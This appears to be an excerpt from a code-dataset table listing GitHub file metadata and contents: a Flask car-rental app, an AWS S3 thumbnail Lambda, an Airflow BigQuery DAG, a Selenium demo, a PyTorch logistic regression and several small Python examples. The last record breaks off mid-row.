blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2b5371fbe0d397efd87bd0c15a7b2fabb376d9e1 | 2a9b29f2a67fde3f5bd3a29355180ea40d2478a7 | /main.spec | 6c5d692837b1d6dfff709c7a768a45deb4e576d8 | [] | no_license | rafero1/mfpj-t1 | 854dc015abec3ff04ec3fdcfa53f3a26234ef7af | ef8a255900cc4df5964f0b219138477f1882aa2c | refs/heads/master | 2020-06-24T05:59:45.479754 | 2019-07-25T16:58:15 | 2019-07-25T16:58:15 | 198,870,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 944 | spec | # -*- mode: python -*-
block_cipher = None
a = Analysis(['main.py'],
pathex=['C:\\Users\\Rafael Avilar\\workspace\\mfpj\\t1'],
binaries=[],
datas=[],
hiddenimports=[],
hookspath=[],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher,
noarchive=False)
pyz = PYZ(a.pure, a.zipped_data,
cipher=block_cipher)
exe = EXE(pyz,
a.scripts,
[],
exclude_binaries=True,
name='main',
debug=False,
bootloader_ignore_signals=False,
strip=False,
upx=True,
console=True )
coll = COLLECT(exe,
a.binaries,
a.zipfiles,
a.datas,
strip=False,
upx=True,
name='main')
| [
"rfl.avlar@outlook.com"
] | rfl.avlar@outlook.com |
c529ad2979c9aea0b99f011b42c1cb8a6eb4a4a0 | 9b9f3f4bb1c1d01c9d61432dbd7ed8138d06581c | /Car_rental_v1/car_rental.py | 4c6485fb15e3b178ee1d6a75c7bce513b025913e | [] | no_license | stqc/learning_flask | 0cc505722da7f32cc4c0c733841e543a2a1e0e23 | 231eb45fa1aafc00cfe09ee9a25f38eeb8bd6614 | refs/heads/master | 2023-01-06T22:17:35.990045 | 2020-11-12T17:07:20 | 2020-11-12T17:07:20 | 299,616,128 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,984 | py | import os
from flask import Flask, render_template,request,url_for,redirect,session
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from forms import upload_form
app = Flask(__name__)
app.config['SECRET_KEY'] ="supersecret"
base = os.path.abspath(os.path.dirname(__file__))
app.config['SQLALCHEMY_DATABASE_URI'] ='sqlite:///'+os.path.join(base,'data.sqlite')
db = SQLAlchemy(app)
Migrate(app,db)
class car(db.Model):
__tablename__ ='car'
id = db.Column(db.Integer,primary_key=True)
name = db.Column(db.Text)
owner = db.Column(db.Text)
booked = db.Column(db.Boolean)
ride = db.relationship('Ride',backref ='cars',uselist=False)
def __init__(self,id,name,owner,booked):
self.id = id
self.name = name
self.owner = owner
self.booked = booked
def __repr__(self):
if self.ride:
return f'{self.name} is booked for {self.ride.destination}'
else:
return f'{self.name} is avaialable'
def get_cars(self):
if not self.booked:
return self.id
class Ride(db.Model):
__tablename__ ='rides'
id = db.Column(db.Integer,primary_key=True)
destination = db.Column(db.Text)
source = db.Column(db.Text)
car = db.Column(db.Integer,db.ForeignKey('car.id'))
def __init__(self,destination,source,car):
self.destination = destination
self.source = source
self.car = car
@app.route('/')
def index():
cars_available = car.query.all()
return render_template('home.html',cars_available= cars_available)
@app.route('/post_car',methods=['GET','POST'])
def post_car():
form = upload_form()
if form.validate_on_submit():
car1 = car(id=form.car_num.data,owner=form.name.data,name =form.car_model.data,booked=False)
db.session.add(car1)
db.session.commit()
return redirect(url_for('index'))
return render_template('cars.html',form=form)
@app.route('/rent',methods=['GET','POST'])
def rentcar():
if request.method =='POST':
r = request.form['car']
dest = request.form['destination']
source = request.form['source']
journey = Ride(destination=dest,source=source,car=r)
selected_Car = car.query.filter_by(id=r).first()
selected_Car.booked = True
db.session.add_all([journey,selected_Car])
db.session.commit()
return redirect(url_for('index'))
return render_template('rent.html',cars_available=car.query.filter_by(booked=False).all())
@app.route('/endride',methods=['GET','POST'])
def ride_end():
if request.method =='POST':
try:
r = request.form['car']
journey=Ride.query.filter_by(car=r).first()
session['d']= journey.destination
session['s'] =journey.source
db.session.delete(journey)
c= car.query.filter_by(id=r).first()
c.booked=False
db.session.commit()
return render_template('delete.html')
except:
pass
return render_template('endride.html')
@app.route('/remove_car', methods=['GET','POST'])
def rm_car():
if request.method == 'POST':
busy = False
try:
to_remove = request.form['car']
ride = car.query.filter_by(id=to_remove).first()
session['removed'] = ride.name
session['owner'] = ride.owner
if ride.booked:
busy = True
return render_template('remove_car.html',busy=busy)
else:
busy = False
db.session.delete(ride)
db.session.commit()
return render_template('del_car.html')
except :
pass
return render_template('remove_car.html')
if __name__ == "__main__":
app.run(debug=True)
| [
"noreply@github.com"
] | stqc.noreply@github.com |
b0d7ee97a930d6bb5f1f7a17fdb1b1c36996681a | f7bc2c6f0bce4397ba7554bc3cea726ce7c8a22d | /lambda_function.py | 038c6eaf2acc66b7e75f42d14e559c8e56e405c7 | [] | no_license | shojibMahabub/generate_thumbnail_s3_lambda | 4103512ff3787e47ccd616ba2db040053dc2b0a1 | f217bdad48b3157b1d0913df1baf2810784f0dc4 | refs/heads/master | 2022-12-01T03:39:54.898856 | 2020-03-09T06:35:52 | 2020-03-09T06:35:52 | 245,083,045 | 0 | 0 | null | 2022-11-22T05:22:14 | 2020-03-05T06:08:43 | Python | UTF-8 | Python | false | false | 3,054 | py | import boto3
import os
from PIL import Image
import pathlib
from io import BytesIO
# configuration
thumbimagebucket = 'resizedimagebucket0099'
backupimagebucket = 'backupimagebucket0099'
mainimagebucket = 'myimagebucket0099'
client = boto3.client('s3')
s3 = boto3.resource('s3')
def delete_this_bucket(name):
'''
def delete_this_bucket()
param bucket_name
This function deletes all object at first by looping through.
As it is required by AWS programmatic access cant delete the
whole bucket at once.
'''
bucket = s3.Bucket(name)
for key in bucket.objects.all():
try:
key.delete()
bucket.delete()
except Exception as e:
print("SOMETHING IS BROKEN !!")
def create_this_bucket(name, location):
'''
def create_this_bucket()
param bucket_name, bucket_location
this function will create bucket from a given location and name
'''
try:
s3.create_bucket(
Bucket=name,
CreateBucketConfiguration={
'LocationConstraint': location
}
)
except Exception as e:
print(e)
def upload_test_images(name):
'''
def upload_test_images()
param bucket_name
this function responsible for uploading images in bucket
'''
for each in os.listdir('./testimage'):
try:
file = os.path.abspath(each)
s3.Bucket(name).upload_file(file, each)
except Exception as e:
print(e)
def copy_to_other_bucket(src, des, key):
try:
copy_source = {
'Bucket': src,
'Key': key
}
bucket = s3.Bucket(des)
bucket.copy(copy_source, key)
except Exception as e:
print(e)
def resize_image(src_bucket, des_bucket):
size = 500, 500
bucket = s3.Bucket(src_bucket)
in_mem_file = BytesIO()
client = boto3.client('s3')
response = client.list_objects_v2(Bucket=src_bucket, Prefix='uploads/')
for obj in response['Contents']:
print(obj['Key'])
file_byte_string = client.get_object(Bucket=src_bucket, Key=obj['Key'])
try:
im = Image.open(BytesIO(file_byte_string['Body'].read()))
im.thumbnail(size, Image.ANTIALIAS)
# ISSUE : https://stackoverflow.com/questions/4228530/pil-thumbnail-is-rotating-my-image
im.save(in_mem_file, format=im.format)
in_mem_file.seek(0)
response = client.put_object(
Body=in_mem_file,
Bucket=des_bucket,
Key=obj['Key']
)
except Exception as e:
print(e)
pass
def lambda_handler(event, context):
response = client.list_objects_v2(Bucket=mainimagebucket, Prefix='uploads/')
for obj in response['Contents']:
copy_to_other_bucket(mainimagebucket, backupimagebucket, obj['Key'])
resize_image(mainimagebucket, thumbimagebucket) | [
"shojibmahabub630@gmail.com"
] | shojibmahabub630@gmail.com |
3ea613abd2f6af3b13759a1d514257a951de2594 | 4d7968edb07729f43739b77fb7be31c9baefd84f | /proxypool/setting.py | 1b7cabafdbe40169019998961036912642dbb274 | [
"Apache-2.0"
] | permissive | AetheWu/proxy_pool | 7dd4e9c588802d744d0c4ca8286d8a9497ad83a4 | 53659038bd93378e97258d6928afff90da4eefa3 | refs/heads/master | 2020-04-08T12:38:14.026188 | 2018-12-11T05:26:40 | 2018-12-11T05:26:40 | 159,355,424 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | "代理池全局参数设置"
#代理池参数
MAX_SCORE = 100
MIN_SCORE = 0
INITIAL_SCORE = 10
POOL_CAPACITY = 200
#Mongo数据库连接
MONGO_HOST = 'mongodb://localhost:27017'
MONGO_KEY = 'proxy'
#调度器循环周期:
TEST_CYCLE = 60
GET_CYCLE = 20
API_ENABLED = True
TEST_ENABLED = True
GET_ENABLED = False
#测试模块设置
TEST_URL = 'http://www.bilibili.com'
BATCH_TEST_SIZE = 20
VALID_STATUS_CODES = [200]
#页面爬取设置
STEP_PAGES = 10 #每次爬取的页面数量
MAX_PAGE = 50 #爬取的最大页数设置
| [
"wzh942633545@gmail.com"
] | wzh942633545@gmail.com |
3beabab40585a32d5f3d2e20747ac5df3265cd43 | 5279abc11aa32cf2ff33159fb72a180ac3145d62 | /parallel_processing_gcp.py | a130abd543d67ff6729872d2de0db3b7900651db | [] | no_license | vatsalsmehta/Apache-Airflow-Bigdata-Pipelines | 891947195ff452e05ef0bf2a998b43bd6949e06e | b3debb64ca0d07698254b872a2db11b5067c1f83 | refs/heads/main | 2023-07-15T15:34:40.944229 | 2021-08-17T12:32:50 | 2021-08-17T12:32:50 | 389,121,482 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,128 | py | #importing libraries
import csv
from airflow.operators.python_operator import PythonOperator
from airflow.contrib.operators.gcs_to_bq import \
GoogleCloudStorageToBigQueryOperator
from google.cloud import bigquery
import pandas as pd
import calendar
import time
from google.cloud import storage
from pandas import DataFrame
from datetime import timedelta, datetime
from airflow import DAG
from airflow.contrib.operators.bigquery_get_data import BigQueryGetDataOperator
from airflow.operators import python_operator
from airflow.models import Variable
from airflow.contrib.operators.bigquery_operator import BigQueryOperator
from airflow.contrib.operators.bigquery_check_operator import BigQueryCheckOperator
import googleapiclient.discovery
import numpy as np
from airflow.models import Variable
import pytz
from datetime import datetime as dt
import sys
import calendar
import warnings
import requests
from google.api_core.client_options import ClientOptions
import math
def_argsman={
"owner":"vatron",
"depends_on_past":False,
"retry_delay":timedelta(minutes=1),
"start_date":datetime(2021,7,20),
"retries":1
}
dag=DAG(
dag_id="parallel_processing_gcp.py",
schedule_interval="@once",
default_args=def_argsman,
catchup=False
)
def get_started(**Kwargs):
print("Starting parallel processing from next task")
def day1_query(**Kwargs):
client=bigquery.Client()
sql_query=''' '''
result_day1_df=client.query(sql_query).to_dataframe()
#print(result_day1_df.head())
try:
#link to your composer environment
path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/day1_eventfreq.csv'
result_day1_df.to_csv(path,index=False)
print("\n\nCSV File Saved\n\n")
except Exception as e:
print("!!!!!!!!!!!!!!!!!!!!Exception occured!!!!!!!!!!!!!!!!!!", e)
raise Exception(e)
def day2_query(**Kwargs):
client=bigquery.Client()
sql_query='''Your day 2 sql query'''
result_day2_df=client.query(sql_query).to_dataframe()
#print(result_day2_df.head())
try:
path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/day2_eventfreq.csv'
result_day2_df.to_csv(path,index=False)
print("\n\nCSV File Saved\n\n")
except Exception as e:
print("!!!!!!!!!!!!!!!!!!!!Exception occured!!!!!!!!!!!!!!!!!!", e)
raise Exception(e)
def day3_query(**Kwargs):
client=bigquery.Client()
sql_query='''your day 3 sql query'''
result_day3_df=client.query(sql_query).to_dataframe()
#print(result_day3_df.columns)
try:
path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/day3_eventfreq.csv'
result_day3_df.to_csv(path,index=False)
print("\n\nCSV File Saved\n\n")
except Exception as e:
print("!!!!!!!!!!!!!!!!!!!!Exception occured!!!!!!!!!!!!!!!!!!", e)
raise Exception(e)
def day4_query(**Kwargs):
client=bigquery.Client()
sql_query=''' Your SQL Query Here'''
result_day4_df=client.query(sql_query).to_dataframe()
#print(result_day4_df.columns)
#print(result_day4_df.info())
try:
path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/day4_eventfreq.csv'
result_day4_df.to_csv(path,index=False)
print("\n\nCSV File Saved\n\n")
except Exception as e:
print("!!!!!!!!!!!!!!!!!!!!Exception occured!!!!!!!!!!!!!!!!!!", e)
raise Exception(e)
def day5_query(**Kwargs):
client=bigquery.Client()
sql_query='''Your Sql Query here'''
result_day5_df=client.query(sql_query).to_dataframe()
#print(result_day5_df.columns)
try:
path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/day5_eventfreq.csv'
result_day5_df.to_csv(path,index=False)
print("\n\nCSV File Saved\n\n")
except Exception as e:
print("!!!!!!!!!!!!!!!!!!!!Exception occured!!!!!!!!!!!!!!!!!!", e)
raise Exception(e)
def day6_query(**Kwargs):
client=bigquery.Client()
sql_query='''Your Sql Query here'''
result_day6_df=client.query(sql_query).to_dataframe()
#print(result_day6_df.columns)
try:
path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/day6_eventfreq.csv'
result_day6_df.to_csv(path,index=False)
print("\n\nCSV File Saved\n\n")
except Exception as e:
print("!!!!!!!!!!!!!!!!!!!!Exception occured!!!!!!!!!!!!!!!!!!", e)
raise Exception(e)
def day7_query(**Kwargs):
client=bigquery.Client()
sql_query='''Your Sql Query here'''
result_day7_df=client.query(sql_query).to_dataframe()
#print(result_day7_df.columns)
try:
path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/day7_eventfreq.csv'
result_day7_df.to_csv(path,index=False)
print("\n\nCSV File Saved\n\n")
except Exception as e:
print("!!!!!!!!!!!!!!!!!!!!Exception occured!!!!!!!!!!!!!!!!!!", e)
raise Exception(e)
def ad_id_query(**Kwargs):
client=bigquery.Client()
sql_query='''Another Sql Query'''
result_ad_id_df=client.query(sql_query).to_dataframe()
try:
path='/asu.csv'
result_ad_id_df.to_csv(path,index=False)
except Exception as error:
print("Exception occured",error)
raise Exception(error)
def fn1_evpreprocessing(**Kwargs):
try:
path='/home/airflow/gcs/data/xyz_preprocessing_datafiles/'
dfs=[]
for i in range(1,8):
temp='day'+str(i)+'_eventfreq.csv'
file_path=path+temp
temp_df=pd.read_csv(file_path)
dfs.append(temp_df)
ad_file_path='/home/airflow/gcs/data/xyz_preprocessing_datafiles/ad_id_day1_day7_eventfreq.csv'
ad=pd.read_csv(ad_file_path)
except Exception as error:
print("Exception occured",error)
raise Exception(error)
print("All Files Read Successfully")
def preprocessing_evfreq(lst, ad):
return lst
evfreq=preprocessing_evfreq(dfs,ad)
def push_googlebq(**Kwargs):
return GoogleCloudStorageToBigQueryOperator(
task_id="push_googlebq",
source_objects=['data/xyz_preprocessing_datafiles/ad_id_day1_day7.csv'],
source_format='CSV',
bucket='asia-east2-xyz-tatacliq-as-c3e3e551-bucket',
write_disposition='WRITE_TRUNCATE',
skip_leading_rows=1,
destination_project_dataset_table='suger_cosmetics_branch.test_ppp',
schema_fields=[
{'name': 'string_field_0', 'type': 'STRING', 'mode': 'NULLABLE'},
]
)
def xyz_usefulfeatures_query(**Kwargs):
client=bigquery.Client()
sql_query='''Select * from xyz'''
result_xyz_usefulfeatures_df=client.query(sql_query).to_dataframe()
print("Query executed")
try:
path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/xyz_usefulfeatures.csv'
result_xyz_usefulfeatures_df.to_csv(path,index=False)
print("\n\nCSV File Saved\n\n")
except Exception as error:
print("!!!!!!!!!!!!!!!!!!!!Exception occured!!!!!!!!!!!!!!!!!!", error)
raise Exception(error)
def preprocessing_evdata(**Kwargs):
try:
usefulfeatures_path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/xyz_usefulfeatures.csv'
city_tier_path='/home/airflow/gcs/data/xyz_preprocessing_datafiles/Copy of City_Tier.xlsx'
evdata=pd.read_csv(usefulfeatures_path)
city_tier=pd.read_excel(city_tier_path)
except Exception as error:
print("Exception occured",error)
raise Exception(error)
with DAG(dag_id="parallel_processing_gcp", schedule_interval="@once", default_args=def_argsman, catchup=False) as dag:
xyz_start = PythonOperator(task_id="xyz_start",python_callable=get_started,provide_context=True,)
start_day1_query = PythonOperator(task_id="start_day1_query",python_callable=day1_query,provide_context=True,)
start_day2_query = PythonOperator(task_id="start_day2_query",python_callable=day2_query,provide_context=True,)
start_day3_query = PythonOperator(task_id="start_day3_query",python_callable=day3_query,provide_context=True,)
start_day4_query = PythonOperator(task_id="start_day4_query",python_callable=day4_query,provide_context=True,)
start_day5_query = PythonOperator(task_id="start_day5_query",python_callable=day5_query,provide_context=True,)
start_day6_query = PythonOperator(task_id="start_day6_query",python_callable=day6_query,provide_context=True,)
start_day7_query = PythonOperator(task_id="start_day7_query",python_callable=day7_query,provide_context=True,)
start_ad_id_query=PythonOperator(task_id="start_ad_id_query",python_callable=ad_id_query,provide_context=True,)
start_preprocessing_evpreprocessing=PythonOperator(task_id="start_preprocessing_evpreprocessing",python_callable=fn1_evpreprocessing,provide_context=True,)
start_push_bigquery=push_googlebq()
start_xyz_usefulfeatures=PythonOperator(task_id="start_xyz_usefulfeatures",python_callable=xyz_usefulfeatures_query,provide_context=True,)
start_preprocessing_evdata=PythonOperator(task_id="start_preprocessing_evdata",python_callable=preprocessing_evdata,provide_context=True,)
xyz_start >> start_day1_query
xyz_start >> start_day2_query
xyz_start >> start_day3_query
xyz_start >> start_day4_query
xyz_start >> start_day5_query
xyz_start >> start_day6_query
xyz_start >> start_day7_query
xyz_start>>start_ad_id_query
start_day1_query>>start_preprocessing_evpreprocessing
start_day7_query>>start_preprocessing_evpreprocessing
start_day4_query>>start_preprocessing_evpreprocessing
start_day5_query>>start_preprocessing_evpreprocessing
start_day6_query>>start_preprocessing_evpreprocessing
start_day2_query>>start_preprocessing_evpreprocessing
start_day3_query>>start_preprocessing_evpreprocessing
start_ad_id_query>>start_preprocessing_evpreprocessing
start_preprocessing_evpreprocessing>>start_push_bigquery>>start_xyz_usefulfeatures>>start_preprocessing_evdata
| [
"vatsalsmehta@gmail.com"
] | vatsalsmehta@gmail.com |
f58f32f62c15a00c4d69fa0ab14dab3b58eba07b | 8069e5de0d28774d58a16cdb44ed59e35fb91663 | /dict_example.py | b755645e6db001094fc7014a69ee50124f8c4a04 | [] | no_license | acqant/demos | be3c829457ffe4fd0724f87b26614d2784a2be3f | f70cf8140fa0ac724913ad82f44d0df740e13f9b | refs/heads/master | 2020-07-21T12:28:28.101774 | 2019-09-11T21:22:15 | 2019-09-11T21:22:15 | 206,864,956 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | import datetime
def simple_dict():
my_dict = {}
my_dict[1] = 'I exist'
my_dict[2] = 'second entry'
#checking if a key exists
def my_function(id, my_dict):
if id in my_dict:
print(f'\t{my_dict[1]}')
else:
print(f'\tNo key {id} found in my_dict')
print("When key exists:")
my_function(1,my_dict)
print("When key does NOT exist:")
my_function(10,my_dict)
print(f'Print all items with my_dict.items:\n {my_dict.items()}')
print(f'Print all keys with my_dict.items:\n {my_dict.keys()}')
for key, value in my_dict.items():
print(f"Key is {key} and item is {value}.")
| [
"acqant@users.noreply.github.com"
] | acqant@users.noreply.github.com |
4b9d8fc4177861f3e58be01a4f9266084f458dea | a066d8b8b9e4c2ce2e57b2603a2826e0c5cd74fd | /lessons/keywords_and_control_flow/examples/ex4.py | 5d6993ff80e5c43644394becbd59d96c6744816c | [] | no_license | delucco/PyClassLessons | a561c5873d7d8ae1cabeb3b5986eb323ae9faf62 | 7af775d102450b8a9d28da8a8fd475ae3144eabf | refs/heads/master | 2021-01-14T12:06:49.382685 | 2015-05-19T01:53:03 | 2015-05-19T01:53:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 176 | py |
i = 0
while i < 100:
if not i % 10:
# break
print "Divisible by 10:", i
i += 1
else:
print "Else statement has occurred."
print "This is the end."
| [
"robbintt@gmail.com"
] | robbintt@gmail.com |
a9204e5cf25d9595f26dafcd328c3ce4c5b295cc | e7865530556fb229b50bdf6d04c68e095372e143 | /AnalyseServer/src/server/Analyse.py | 97b27b440b31dd6a74fca5927e44e65b66a72330 | [] | no_license | asdzheng/AnalyseServer | a37b7cba0cdd064ea611dd8dd481152b38108c86 | e71f21c9da5699c54c4679ad0d996df4d2bdd47c | refs/heads/master | 2016-09-06T01:30:25.195724 | 2014-03-09T08:14:10 | 2014-03-09T08:14:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | import tornado.ioloop
import tornado.web
from pymongo import Connection
class MainHandler(tornado.web.RequestHandler):
def get(self):
json = self.get_argument('json', "Hello World");
self.write(json)
def post(self):
conn = Connection()
db = conn.First
appCollection = db.app1
json = self.get_argument('json', 'Hello World~')
json = json[1,len(json)-1]
appCollection.insert(json)
# app1 = appCollection.find()
# appCollection.insert({'name':'test'})
self.write(json)
if __name__ == "__main__":
application = tornado.web.Application([(r"/AnalyseServer", MainHandler)])
application.listen(8080)
tornado.ioloop.IOLoop.instance().start()
| [
"zhengjiabo@gmail.com"
] | zhengjiabo@gmail.com |
d5cd69bc39db446dab3c1bfa0714fd10795d9b13 | 107941a50c3adc621563fe0254fd407ea38d752e | /spider_03.py | ff843e21ab654378dec18c1fae8d152647acbf11 | [] | no_license | zhangliang852469/spider_ | 758a4820f8bd25ef6ad0edbd5a4efbaaa410ae08 | 718208c4d8e6752bbe8d66a209e6d7446c81d139 | refs/heads/master | 2020-04-05T07:12:03.790358 | 2018-11-08T07:17:22 | 2018-11-08T07:17:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,034 | py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
"""节点交互 """
from selenium import webdriver
import time
# browser = webdriver.Chrome()
# browser.get('https://www.taobao.com')
# input = browser.find_element_by_id('q')
# input.send_keys('iPhone')
# time.sleep(1)
# input.clear()
# input.send_keys('iPad')
# button = browser.find_element_by_class_name('btn-search')
# button.click()
"""在这里我们首先驱动浏览器打开淘宝,然后用 find_element_by_id() 方法获取输入框,
然后用 send_keys() 方法输入 iPhone 文字,等待一秒之后用 clear() 方法清空输入框,
再次调用 send_keys() 方法输入 iPad 文字,之后再用 find_element_by_class_name()
方法获取搜索按钮,最后调用 click() 方法完成搜索动作。"""
browser = webdriver.Chrome()
browser.get('https://www.taobao.com')
input = browser.find_element_by_id('q')
input.send_keys('iPone')
time.sleep(1)
input.clear()
input.send_keys('iPad')
button = browser.find_element_by_class_name('btn-search')
button.click()
| [
"710567585@qq.com"
] | 710567585@qq.com |
733066d1f4c502422a562cffcbd197aad6d660e1 | e2fdc0dbaac7eb6b0acdfb8990b710d418a49a70 | /utils/logistic_regression_pytorch.py | 0a288663f217db82e6aad19231257354f8c9ed0d | [
"MIT"
] | permissive | ikanher/AHGP | 55580df34e8d41014a13dce08dd18f36c2058cfd | 8750823790ec6abece78e31cc0ec7a6162656a75 | refs/heads/main | 2023-02-18T03:44:29.000162 | 2021-01-14T09:37:25 | 2021-01-14T09:37:25 | 329,567,127 | 0 | 0 | MIT | 2021-01-14T09:28:52 | 2021-01-14T09:28:52 | null | UTF-8 | Python | false | false | 3,491 | py | import time
import numpy as np
import torch
import torch.nn as nn
import torchvision.transforms as transforms
import torchvision.datasets as dsets
def prepare_mnist_data(batch_size):
train_val_dataset = dsets.MNIST(root='./data', train=True, transform=transforms.ToTensor(), download=True)
train_dataset, val_dataset = torch.utils.data.random_split(train_val_dataset, [50000, 10000])
test_dataset = dsets.MNIST(root='./data', train=False, transform=transforms.ToTensor())
train_loader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)
val_loader = torch.utils.data.DataLoader(dataset=val_dataset, batch_size=batch_size, shuffle=True)
test_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=False)
return train_loader, val_loader, test_loader
class LogisticRegressionModel(nn.Module):
def __init__(self, input_dim, output_dim, alpha_l1, alpha_l2, learning_rate):
super(LogisticRegressionModel, self).__init__()
self.input_dim = input_dim
self.output_dim = output_dim
self.learning_rate = learning_rate
self.linear = nn.Linear(self.input_dim, self.output_dim)
self.alpha_l1 = alpha_l1
self.alpha_l2 = alpha_l2
self.optimizer = torch.optim.SGD(self.parameters(), lr=self.learning_rate)
self.criterion = nn.CrossEntropyLoss()
def forward(self, x):
out = self.linear(x)
return out
def one_step(self, images, labels):
images = images.view(-1, self.input_dim).requires_grad_()
self.optimizer.zero_grad()
outputs = self.forward(images)
loss = self.criterion(outputs, labels) + self.alpha_l1 * torch.sum(torch.abs(self.linear.weight)) + self.alpha_l2 * torch.norm(self.linear.weight) ** 2
loss.backward()
self.optimizer.step()
def calc_accuracy(self, dataloader):
correct = 0
total = 0
for images, labels in dataloader:
images = images.view(-1, self.input_dim).requires_grad_()
outputs = self.forward(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum()
accuracy = 100. * correct.item() / total
return accuracy
def logistic_regression_training(parameters, time_limit=10, check_per_iterations=50):
log_alpha_l1, log_alpha_l2, log_batch_size, log_learning_rate = parameters.flatten()
alpha_l1, alpha_l2, batch_size, learning_rate = np.exp(log_alpha_l1), np.exp(log_alpha_l2), np.exp(log_batch_size), np.exp(log_learning_rate)
batch_size = int(batch_size)
train_loader, val_loader, test_loader = prepare_mnist_data(batch_size=batch_size)
model = LogisticRegressionModel(input_dim=28*28, output_dim=10, alpha_l1=alpha_l1, alpha_l2=alpha_l2, learning_rate=learning_rate)
starting_time = time.time()
cnt = 0
while True:
for i, (images, labels) in enumerate(train_loader):
model.one_step(images, labels)
cnt += 1
if cnt % check_per_iterations == 0:
if time.time() - starting_time > time_limit:
break
if time.time() - starting_time > time_limit:
break
training_accuracy = model.calc_accuracy(train_loader)
val_accuracy = model.calc_accuracy(val_loader)
test_accuracy = model.calc_accuracy(test_loader)
return -training_accuracy, -val_accuracy, -test_accuracy
if __name__ == '__main__':
training_accuracy, val_accuracy, test_accuracy = logistic_regression_training([-8., -8., 3., -2.])
print(training_accuracy, val_accuracy, test_accuracy)
| [
"liusulin92@gmail.com"
] | liusulin92@gmail.com |
afb361b22b4a2c9a14030264ca29d44363e14ebc | 25b19cd0c0211de51fd307cdd43e19f9ffa924f5 | /venv/Scripts/pip3.7-script.py | 806411e5f41efd35c98f182d02a92539d5d764c9 | [] | no_license | izazm8/TravelPlanner | 2237fd556c9f57109b351072ae8c79f0ad7b9f51 | 52d212da7bac21a30589c3ea83be56325173b1b4 | refs/heads/master | 2020-04-19T09:15:19.425587 | 2018-12-30T22:26:36 | 2018-12-30T22:26:36 | 168,104,420 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 428 | py | #!C:\Users\Mustaghees\PycharmProjects\TravelPlanner\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3.7'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3.7')()
)
| [
"renaldpirate@gmail.com"
] | renaldpirate@gmail.com |
64dd9b08095b15380f853a6fdd8e0a8ed26d1465 | c3329e4c6fa308f9a41fa18af36445f32b875f4a | /setup.py | 6475648b60bfe85fa434f5922a94355862b4b9b1 | [
"MIT"
] | permissive | rritoch/pandas_zmq | 6ac0379b150eac95ffd6188c3cf8faf786536846 | d428fb049a52a2dc7e850156bfa2a0d16831177b | refs/heads/master | 2022-11-25T01:10:49.850963 | 2020-07-28T08:33:00 | 2020-07-28T08:33:00 | 279,081,623 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 700 | py | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="pandas-zmq",
version="0.0.3",
author="Ralph Ritoch",
author_email="rritoch@gmail.com",
description="Communicate Pandas DataFrame over ZeroMQ connection",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/rritoch/pandas_zmq",
packages=['pandas_zmq'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=[
'pyzmq',
],
python_requires='>=3.3',
)
| [
"rritoch@gmail.com"
] | rritoch@gmail.com |
9ae24247dda00fad800f80dd2c1f56c3c26b82c1 | 29a5b663a88c5763d6176a0408b51f2d9f46adbf | /python/lecture3/tasks/views.py | a2049bedf1bdb2e66397500a0ef794ac1ae3771f | [] | no_license | chanakaudaya/cs50-source-code | f8c6de41c34ca5ad4dea7aecf62ed220cbdb1af6 | 975b46ded13f656e18dcc8bba8266c8947576958 | refs/heads/main | 2023-06-18T02:21:25.959233 | 2021-07-18T06:43:23 | 2021-07-18T06:49:30 | 387,109,051 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | from django.shortcuts import render
tasks = ["foo", "bar", "baz"]
# Create your views here.
def index(request):
return render(request, "tasks/index.html", {
"tasks": tasks
})
def add(request):
return render(request, "tasks/add.html") | [
